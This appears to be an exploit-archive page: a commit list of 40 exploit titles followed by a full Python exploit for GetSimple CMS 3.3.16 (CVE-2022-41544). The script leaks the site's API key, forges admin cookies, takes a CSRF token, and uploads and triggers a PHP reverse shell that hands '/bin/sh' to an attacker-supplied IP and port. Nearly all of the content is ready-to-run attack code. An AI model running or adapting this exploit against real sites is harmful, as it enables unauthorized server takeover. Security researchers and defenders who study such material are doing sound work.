0a7adaa3fc
40 changes to exploits/shellcodes/ghdb Optoma 1080PSTX Firmware C02 - Authentication Bypass Screen SFT DAB 600/C - Authentication Bypass Account Creation Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Screen SFT DAB 600/C - Authentication Bypass Erase Account Screen SFT DAB 600/C - Authentication Bypass Password Change Screen SFT DAB 600/C - Authentication Bypass Reset Board Config Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Apache Superset 2.0.0 - Authentication Bypass FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) Affiliate Me Version 5.0.1 - SQL Injection Best POS Management System v1.0 - Unauthenticated Remote Code Execution Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) e107 v2.3.2 - Reflected XSS File Thingie 2.5.7 - Remote Code Execution (RCE) GetSimple CMS v3.3.16 - Remote Code Execution (RCE) LeadPro CRM v1.0 - SQL Injection PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) Prestashop 8.0.4 - CSV injection Quicklancer v1.0 - SQL Injection SitemagicCMS 4.4.3 - Remote Code Execution (RCE) Smart School v1.0 - SQL Injection Stackposts Social Marketing Tool v1.0 - SQL Injection thrsrossi Millhouse-Project 1.414 - Remote Code Execution TinyWebGallery v2.5 - Remote Code Execution (RCE) WBiz Desk 1.2 - SQL Injection Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking MobileTrans 4.0.11 - Weak Service Privilege Escalation Trend Micro OfficeScan Client 10.0 - ACL Service LPE eScan Management Console 14.0.1400.2281 - Cross Site Scripting eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
140 lines
No EOL
4.3 KiB
Python
Executable file
140 lines
No EOL
4.3 KiB
Python
Executable file
# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
|
|
# Data: 18/5/2023
|
|
# Exploit Author : Youssef Muhammad
|
|
# Vendor: Get-simple
|
|
# Software Link:
|
|
# Version app: 3.3.16
|
|
# Tested on: linux
|
|
# CVE: CVE-2022-41544
|
|
|
|
import sys
|
|
import hashlib
|
|
import re
|
|
import requests
|
|
from xml.etree import ElementTree
|
|
from threading import Thread
|
|
import telnetlib
|
|
|
|
purple = "\033[0;35m"
|
|
reset = "\033[0m"
|
|
yellow = "\033[93m"
|
|
blue = "\033[34m"
|
|
red = "\033[0;31m"
|
|
|
|
def print_the_banner():
|
|
print(purple + '''
|
|
CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4
|
|
C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4
|
|
C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444
|
|
C V V E 2 00 0 2 2 4 11 5 4 4
|
|
CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4
|
|
'''+ reset)
|
|
|
|
def get_version(target, path):
|
|
r = requests.get(f"http://{target}{path}admin/index.php")
|
|
match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)
|
|
if match:
|
|
version = match.group(1)
|
|
if version <= "3.3.16":
|
|
print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")
|
|
else:
|
|
print ("This is not vulnrable to this CVE")
|
|
return version
|
|
return None
|
|
|
|
def api_leak(target, path):
|
|
r = requests.get(f"http://{target}{path}data/other/authorization.xml")
|
|
if r.ok:
|
|
tree = ElementTree.fromstring(r.content)
|
|
apikey = tree[0].text
|
|
print(f"[+] apikey obtained {apikey}")
|
|
return apikey
|
|
return None
|
|
|
|
def set_cookies(username, version, apikey):
|
|
cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()
|
|
cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()
|
|
cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"
|
|
headers = {
|
|
'Content-Type':'application/x-www-form-urlencoded',
|
|
'Cookie': cookies
|
|
}
|
|
return headers
|
|
|
|
def get_csrf_token(target, path, headers):
|
|
r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)
|
|
m = re.search('nonce" type="hidden" value="(.*)"', r.text)
|
|
if m:
|
|
print("[+] csrf token obtained")
|
|
return m.group(1)
|
|
return None
|
|
|
|
def upload_shell(target, path, headers, nonce, shell_content):
|
|
upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"
|
|
payload = {
|
|
'content': shell_content,
|
|
'edited_file': '../shell.php',
|
|
'nonce': nonce,
|
|
'submitsave': 1
|
|
}
|
|
try:
|
|
response = requests.post(upload_url, headers=headers, data=payload)
|
|
if response.status_code == 200:
|
|
print("[+] Shell uploaded successfully!")
|
|
else:
|
|
print("(-) Shell upload failed!")
|
|
except requests.exceptions.RequestException as e:
|
|
print("(-) An error occurred while uploading the shell:", e)
|
|
def shell_trigger(target, path):
|
|
url = f"http://{target}{path}/shell.php"
|
|
try:
|
|
response = requests.get(url)
|
|
if response.status_code == 200:
|
|
print("[+] Webshell trigged successfully!")
|
|
else:
|
|
print("(-) Failed to visit the page!")
|
|
except requests.exceptions.RequestException as e:
|
|
print("(-) An error occurred while visiting the page:", e)
|
|
|
|
def main():
|
|
if len(sys.argv) != 5:
|
|
print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")
|
|
return
|
|
|
|
target = sys.argv[1]
|
|
path = sys.argv[2]
|
|
if not path.endswith('/'):
|
|
path += '/'
|
|
|
|
ip, port = sys.argv[3].split(':')
|
|
username = sys.argv[4]
|
|
shell_content = f"""<?php
|
|
$ip = '{ip}';
|
|
$port = {port};
|
|
$sock = fsockopen($ip, $port);
|
|
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
|
|
"""
|
|
|
|
version = get_version(target, path)
|
|
if not version:
|
|
print("(-) could not get version")
|
|
return
|
|
|
|
apikey = api_leak(target, path)
|
|
if not apikey:
|
|
print("(-) could not get apikey")
|
|
return
|
|
|
|
headers = set_cookies(username, version, apikey)
|
|
|
|
nonce = get_csrf_token(target, path, headers)
|
|
if not nonce:
|
|
print("(-) could not get nonce")
|
|
return
|
|
|
|
upload_shell(target, path, headers, nonce, shell_content)
|
|
shell_trigger(target, path)
|
|
|
|
if __name__ == '__main__':
|
|
print_the_banner()
|
|
main() |